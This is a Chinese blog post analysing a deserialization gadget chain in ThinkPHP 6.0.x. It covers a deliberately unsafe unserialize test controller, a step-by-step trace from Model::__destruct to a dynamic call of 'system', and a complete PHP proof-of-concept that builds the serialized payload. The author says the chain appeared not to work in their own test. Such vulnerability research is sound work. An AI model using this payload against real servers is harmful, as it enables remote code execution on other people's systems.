Thinkphp6.0.x反序列化分析

已于 2022-02-24 11:39:45 修改
阅读量1k 收藏
点赞数 3
分类专栏: Web安全 文章标签: php 开发语言 后端
于 2022-02-24 01:01:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/123102811
版权

环境搭建

Phpstudy:

  • OS: Windows
  • PHP: 7.3.4
  • ThinkPHP: 6.0.1

创建测试环境:

composer create-projec topthink/think:6.0.* tp6.0.1

之后进入composer.json修改"topthink/framework": "6.0.1",再执行composer update

创建入口点:

app/controller/Index.php

<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {
        if(isset($_POST['data'])){
            unserialize($_POST['data']);
        }else{
            highlight_file(__FILE__);
        }
    }
}

漏洞分析

ThinkPHP5.x 的POP链中,入口都是 think\process\pipes\Windows 类,通过该类触发任意类的 __toString 方法。但是 ThinkPHP6.x 的代码移除了 think\process\pipes\Windows 类,而POP链 __toString 之后的 Gadget 仍然存在,所以我们得继续寻找可以触发 __toString 方法的点。

首先需要找__destruct函数,可利用的函数在vendor\topthink\think-orm\src\Model.php

image-20220223221829668

满足$this->lazySave为true则进入save()函数,跟进

image-20220223222624389

这里需要满足if语句为真才能进入下一步,跟进一下这两个函数

对于$this->isEmpty(),需要满足$this->data不为空

image-20220223223041901

对于$this->trigger(),满足$this->withEvent == false即可返回true

image-20220223223302219

之后就进入到

 $result = $this->exists ? $this->updateData() : $this->insertData($sequence);

根据大师傅们的路线,updateData()方法可继续利用,这里需要满足$this->exists=true

跟进updateData()方法

image-20220223223946150

我们的利用点在checkAllowFields(),需要满足前面两个if语句

经过分析需满足

  • $this->withEvent == false
  • $this->force == true,并且$this-data不为空

接下来跟进checkAllowFields()函数

image-20220223224534293

我们需要进入$this->db(),同样需要满足前面的if语句,而这两个参数默认为空,无需构造

跟进db()

image-20220223225041213

这里进行了字符串拼接,并且两个值可控,那么就可以触发__toString()方法

全局搜索__toString()方法,利用点在vendor\topthink\think-orm\src\model\concern\Conversion.php

image-20220223225751202

跟进toJson()

image-20220223230030224

跟进toArray()

image-20220223231908095

$data进行遍历,$data来自$this->data,默认情况下进入第二个elseif语句,$key作为参数调用getAttr()函数,继续跟进:

image-20220223232250266

查看getData方法

image-20220223232437599

这里$name就是传入的$key,跟进getRealFieldName()方法

image-20220223233155150

最终getAttr()返回值是

return $this->getValue($name, $value, $relation);

参数$name则是从toArray()传进来的$key,而参数$value的值就是$this->data[$key]

跟进getValue()

image-20220223234044195

最终利用点在

$value = $closure($value, $this->data);

$this->withAttr数组存在和$date一样的键$key,并且这个键对应的值不能为数组,就会把$this->withAttr[$key]withAttr数组$key键对应的值)当做函数名动态执行,参数为$this->date[$key]

我们控制:

$this->withAttr = ["key" => "system"];
$this->data = ["key" => "whoami"];

最终就可以RCE

POP链构造

整体的利用链

__destruct
↓
save()
↓
updateData()
↓
checkAllowFields()
↓
db()
↓
name($this->name . $this->suffix)
↓    
__toString()
↓
toJson()
↓
toArray()
↓
getAttr()
↓
getValue()
↓
$closure = $this->withAttr[$fieldName];
$value   = $closure($value, $this->data);

需要注意的是Model类是抽象类,不能实例化。得找出Model类的一个子类进行实例化,这里可以用Pivot类进行利用。

最终构造POC:

<?php

namespace think\model\concern;

trait Attribute
{
    private $data = ["snakin" => "whoami"];
    private $withAttr = ["snakin" => "system"];
}

namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{}

echo urlencode(serialize(new Pivot(new Pivot())));

写在后面

实际测试的时候链子好像已经失效了,github官方也没有commit记录,自己太菜也没发现什么问题(ps.有没有师傅告诉我)呜呜呜,不过链子还是可以分析一下的。

参考链接:

https://blog.csdn.net/rfrder/article/details/114686095

https://blog.csdn.net/qq_42181428/article/details/105777872

Snakin_ya
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
thinkphp v6.0.x 序列利用链分析
qq_41891666的博客
07-25 708
0x00 前言 继续分析 thinkphp v6.0.x 序列利用链,本来是打算先分析 thinkphp v5.2.x 的利用链的,但是使用composer 安装失败,而且官方又说只能通过composer 来安装 , 网上找了好久没找到解决方法,然后去github上面提交 issue ,官方给的回复 是没有 5.2版本,这个回答确实有点懵。 所以就先来分析 6.0.x 的序列利用链。 0x01 分析 thinkphp 6.0 __toString() 后面的利用链和 thinkphp 5.2 是
thinkphp6.x 序列漏洞
weixin_61785633的博客
07-09 1015
thinkphp5.x的序列还在贴图片,md文件不能直接沾上来难受,而这个遇到个奇怪的问题,一个代码开始能运行,过段时间居然报错了,不得不说计算机挺玄学的。
TP6和TP5两个项目互相读取session报错unserialize(): Error at offset 0 of 474 bytes
最新发布
zhujun300的博客
04-12 375
TP6中session读取时,报错如上,在框架文件Driver.php第264行unserialize()序列方法。使用TP6框架读取TP5存储的session内容时,内容中多了前缀 "dev:|" ,然后报错如上。目前手动解决方法替换字符串 "dev:|"。
php序列6,thinkphp6的另序列分析
weixin_33895396的博客
03-28 428
thinkphp6的另序列分析本文首发于“合天网安实验室”转载请注明出处!你是否正在收集各类网安网安知识学习,合天网安实验室为你总结了1300+网安技能任你学,点击获取免费靶场知识点实操概要实操探寻ThinkPHP5远程命令执行漏洞形成原因,各种姿势利用方法。链接指路:ThinkPHP5远程命令执行漏洞点击链接马上体验Forward之前分析过tp6的一个链;当时是利用__toString方法去...
Think PHP 6.0.13序列分析
qq_60481227的博客
10-13 1120
Think PHP6.0.13序列
thinkphp6的另序列分析
蚁景网安学院
02-05 303
知识点实操概要实操探寻ThinkPHP5远程命令执行漏洞形成原因,各种姿势利用方法。链接指路:https://www.hetianlab.com/expc.do?ec=ECIDb06f-9...
ThinkPHP6.0.zip
02-21
作为ThinkPHP框架的最新版本,6.0带来了许多重要的改进和新特性,为开发者提供了更为现代的开发体验。 1. **全新架构**:ThinkPHP6.0采用了全新的架构设计,基于PSR-7和PSR-15标准,增强了中间件的使用,使得代码...
ThinkPHP 6.x序列POP链(一)1
08-03
《深入理解ThinkPHP 6.x序列POP链利用》 在网络安全领域,ThinkPHP作为国内广泛应用的PHP框架,其安全问题备受关注。本文将详细探讨ThinkPHP 6.x版本中的一个特定安全问题——序列POP链的利用,帮助开发者...
ThinkPHP 6.x序列POP链(三)1
08-03
总结起来,ThinkPHP 6.x中的这个序列POP链利用了`league/flysystem-cached-adapter`库中的`AbstractCache`和`Adapter`类,通过控制`pathPrefix`和`$contents`,能够在服务器上写入恶意代码,造成潜在的安全风险...
ThinkPhp6.0 think-6.0.zip
09-01
《深入解析ThinkPHP6.0框架》 ThinkPHP6.0,简称TP6,是基于PHP7.1+开发的一款轻量级、高效且全面的PHP框架,代表着ThinkPHP框架的最新版本。作为国内广泛使用的PHP框架之一,ThinkPHP6.0在保持原有优势的基础上,...
Mochazz#ThinkPHP-Vuln#ThinkPHP5.2.X序列利用链1
07-25
环境搭建将 application/index/controller/Index.php 代码修改成如下:利用条件有一个内容完全可控的序列点,例如: uns
ThinkPHP6.x序列POC
Armandhe的博客
04-06 735
ThinkPHP6.x序列POC
ThinkPHP5.0.24序列POC
Armandhe的博客
04-06 1624
ThinkPHP5.0.24序列POC
ThinkPHP5.0.x 序列分析
ki10Moc的博客
07-29 843
垃圾文章不要看
从安洵杯学习thinkphp 6.x序列POP链
一个安全研究员
02-17 1054
依旧膜拜师傅们
[代码审计] ThinkPHP V6.0.12LTS 序列漏洞
Only_kele_ 的博客
06-07 4855
在PHP中,序列话分为有类和无类两种,无类的序列利用比较简单直接。有类的时候一般需要挖掘利用链,其中起到关键作用的就是魔术方法,魔术方法是连接利用链的桥梁。在挖掘序列的时候,一般来说首先要找的就是 , 两个函数 1.2 寻找触发条件 用全局搜索存在的地方 然后找可利用的点,在中发现 调用了方法,只需要 为 即可,并且这个参数是可控的 跟进方法,关键点如下,需要进入到函数,要绕过位置1处的判断和为 是可控的,所以关键点是绕过前面的判断 查看函数,使用函数对进行判断,不为空即可,
Thinkphp5.0.x_RCE复现&5.0.24序列大礼包
大博的博客
08-07 6301
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 序列环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 序列的应用(需要存在序列的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
Thinkphp5.1.4序列漏洞复现
m0_64348326的博客
05-12 1225
刚好都是被抽象类Model所使用,但由于抽象类无法被new,也就是实例,所以我们要找一个它的子类,在phpstorm提示有一个继承者。合并的操作,而call_user_func函数取得也是该参数的地址内的值,所以让它作为get传递的参数名即可,直接赋执行命令的值。然后就是合并请求参数,最后返回调用的input方法,可以看到。在类继承时,我直接调用了privot作为实例对象,并未继承其父类,而是直接将其父类Model的。数组的键名,这两个属性我们都可控,于是可以返回该数组中$name键名对应的键值。
thinkphp5.1.x序列漏洞复现与分析
weixin_45794666的博客
03-02 2994
thinkphp5.1.x序列漏洞复现与分析 环境搭建 安装compoer https://install.phpcomposer.com/composer.phar 放在php目录下,在 PHP 安装目录下新建一个 composer.bat 文件,并将下列代码保存到此文件中 @php "%~dp0composer.phar" %* 进入web根目录进行安装 composer create-project topthink/think=5.1.35 tp5.1 访问 http://localhos
thinkphp6.0入门必读.pdf
08-20
ThinkPHP6.0是一款现代、高效的PHP开发框架,具有强大的功能和简洁的代码风格,是广大PHP开发者必备的工具。 《ThinkPHP6.0入门必读》首先对ThinkPHP框架的基本概念做了详细介绍,包括MVC架构、路由、控制器、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值